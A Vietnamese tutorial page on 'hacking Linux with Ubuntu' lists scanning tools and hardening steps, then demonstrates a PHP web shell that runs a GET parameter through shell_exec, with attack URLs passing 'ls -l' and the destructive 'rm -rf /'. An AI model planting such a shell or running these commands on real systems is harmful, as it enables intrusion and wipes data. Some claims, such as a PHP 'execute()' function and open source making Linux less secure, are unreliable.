Hacking Linux OS : Hacking với Ubuntu

Linux là hệ điều hành máy chủ được sử dụng rộng rãi nhất, đặc biệt là đối với các máy chủ web. Nó là mã nguồn mở; điều này có nghĩa là bất kỳ ai cũng có thể có quyền truy cập vào mã nguồn. Điều này làm cho nó kém an toàn hơn so với các hệ điều hành khác vì những kẻ tấn công có thể nghiên cứu mã nguồn để tìm ra các lỗ hổng . Linux cho Tin tặc là về việc khai thác các lỗ hổng này để truy cập trái phép vào hệ thống.

Trong bài viết này, chúng tôi sẽ giới thiệu cho bạn biết Linux là gì, các lỗ hổng bảo mật của nó, cách hack với Ubuntu và các biện pháp khắc phục mà bạn có thể áp dụng.

Tham khảo tất cả về Hacking

Các chủ đề được đề cập trong hướng dẫn này

  • Linux
  • Công cụ lấy cắp dữ liệu Linux
  • Cách ngăn chặn hack Linux
  • Hoạt động lấy cắp dữ liệu: Hack hệ thống Linux bằng PHP

Linux là một hệ điều hành mã nguồn mở . Có rất nhiều bản phân phối hệ điều hành dựa trên Linux như Redhat, Fedora, Ubuntu, … Không giống như các hệ điều hành khác, Linux kém an toàn hơn khi nói đến bảo mật. Điều này là do mã nguồn có sẵn miễn phí, vì vậy rất dễ dàng để nghiên cứu các lỗ hổng và khai thác chúng so với các hệ điều hành khác không phải là mã nguồn mở. Linux có thể được sử dụng làm hệ điều hành máy chủ, máy tính để bàn, máy tính bảng hoặc thiết bị di động.

Các chương trình Linux có thể được vận hành bằng GUI hoặc các lệnh. Các lệnh Linux để hack Kali Linux hiệu quả và hiệu quả hơn so với việc sử dụng GUI. Vì lý do này, nó giúp biết các lệnh cơ bản của Linux để hack.

Công cụ lấy cắp dữ liệu Linux

  • Nessus – công cụ này có thể được sử dụng để hack Ubuntu, quét cài đặt cấu hình, bản vá và mạng, v.v. Bạn có thể tìm thấy nó tại https://www.tenable.com/products/nessus
  • NMap. Công cụ này có thể được sử dụng để giám sát các máy chủ đang chạy trên máy chủ và các dịch vụ mà chúng đang sử dụng. Nó cũng có thể được sử dụng để quét các cổng. Nó có thể được tìm thấy tại https://nmap.org/
  • SARA – SARA là từ viết tắt của Security Auditor’s Research Assistant. Như tên của nó, công cụ này có thể được sử dụng để kiểm tra mạng chống lại các mối đe dọa như SQL Injection, XSS, v.v. Bạn có thể tìm thấy công cụ này tại http://www-arc.com/sara/sara.html

Danh sách trên không toàn diện; nó cung cấp cho bạn một ý tưởng về các công cụ có sẵn để hack Ubuntu và hack hệ thống Linux.

Cách ngăn chặn hack Linux

Linux Hacking tận dụng các lỗ hổng trong hệ điều hành. Một tổ chức có thể áp dụng chính sách sau để tự bảo vệ mình trước các cuộc tấn công như vậy.

  • Quản lý bản vá – bản vá sửa các lỗi mà kẻ tấn công khai thác để xâm phạm hệ thống. Một chính sách quản lý bản vá tốt sẽ đảm bảo rằng bạn liên tục áp dụng các bản vá có liên quan cho hệ thống của mình.
  • Cấu hình hệ điều hành thích hợp – các khai thác khác tận dụng các điểm yếu trong cấu hình của máy chủ. Tên người dùng và daemon không hoạt động sẽ bị vô hiệu hóa. Các cài đặt mặc định như mật khẩu chung cho ứng dụng, tên người dùng mặc định và một số số cổng phải được thay đổi.
  • Hệ thống phát hiện xâm nhập – những công cụ như vậy có thể được sử dụng để phát hiện truy cập trái phép vào hệ thống. Một số công cụ có khả năng phát hiện và ngăn chặn các cuộc tấn công như vậy.

Hoạt động lấy cắp dữ liệu: Hack hệ thống Ubuntu Linux bằng PHP

Trong kịch bản thực tế này, chúng ta sẽ tìm hiểu cách hack với Ubuntu và chúng tôi sẽ cung cấp cho bạn thông tin cơ bản về cách bạn có thể sử dụng PHP để xâm nhập Linux. Chúng tôi sẽ không nhắm vào bất kỳ nạn nhân nào. Nếu bạn muốn dùng thử, bạn có thể cài đặt LAMPP trên máy cục bộ của mình.

PHP đi kèm với hai hàm có thể được sử dụng để thực thi các lệnh hack Linux. Nó có các hàm execute () và shell_exec (). Hàm execute () trả về dòng cuối cùng của đầu ra lệnh trong khi shell_exec () trả về toàn bộ kết quả của lệnh dưới dạng một chuỗi.

Với mục đích trình diễn, hãy giả sử những người quản lý kẻ tấn công tải tệp sau lên máy chủ web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

Tập lệnh trên nhận lệnh từ biến GET có tên là cmd. Lệnh được thực thi bằng shell_exec () và kết quả trả về trong trình duyệt.

Mã trên có thể được khai thác bằng cách sử dụng URL sau

http: //localhost/cp/konsole.php? cmd = ls% 20-l

  • “… Konsole.php? Cmd = ls% 20-l” gán giá trị ls –l cho biến cmd .

Lệnh trong Ubuntu để tấn công máy chủ sẽ được thực thi như

shell_exec ('ls -l');

Việc thực thi đoạn mã trên trên máy chủ web cho kết quả tương tự như sau.

Lệnh trên chỉ hiển thị các tệp trong thư mục hiện tại và các quyền

Giả sử kẻ tấn công chuyển lệnh sau

rm -rf /
  • “Rm” xóa các tệp
  • “Rf” làm cho lệnh rm chạy ở chế độ đệ quy. Xóa tất cả các thư mục và tệp
  • “/” Hướng dẫn lệnh bắt đầu xóa tệp khỏi thư mục gốc

URL tấn công sẽ trông giống như thế này

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Tóm lược

  • Linux là một hệ điều hành phổ biến cho máy chủ, máy tính để bàn, máy tính bảng và thiết bị di động.
  • Linux là mã nguồn mở và bất kỳ ai cũng có thể lấy mã nguồn này. Điều này giúp bạn dễ dàng phát hiện ra các lỗ hổng. Nó là một trong những hệ điều hành tốt nhất cho tin tặc.
  • Các lệnh cơ bản và hack mạng trong Ubuntu rất có giá trị đối với các hacker Linux.
  • Các lỗ hổng bảo mật là một điểm yếu có thể bị lợi dụng để xâm phạm hệ thống.
  • Một bảo mật tốt có thể giúp bảo vệ hệ thống khỏi bị xâm nhập bởi kẻ tấn công.
Back to top button